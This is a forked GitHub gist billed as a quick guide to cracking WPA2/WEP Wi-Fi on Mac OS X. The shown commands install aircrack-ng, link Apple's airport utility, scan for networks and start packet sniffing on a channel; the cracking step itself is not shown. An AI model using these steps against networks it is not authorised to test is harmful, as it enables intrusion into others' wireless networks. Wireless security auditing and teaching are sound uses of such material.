Skip to content

Instantly share code, notes, and snippets.

View vayouva's full-sized avatar
🎓
Focusing

Youva A vayouva

🎓
Focusing
View GitHub Profile
@vayouva
vayouva / Aircrack Commands
Created April 25, 2018 16:47 — forked from victorreyesh/Aircrack Commands
Cracking WPA2 / WEP Wifi / Aircrack 10 seconds guide. For Mac OSX
//Install Macports.
//Install aircrack-ng:
sudo port install aircrack-ng
//Install the latest Xcode, with the Command Line Tools.
//Create the following symlink:
sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/sbin/airport
//Figure out which channel you need to sniff:
sudo airport -s
sudo airport en1 sniff [CHANNEL]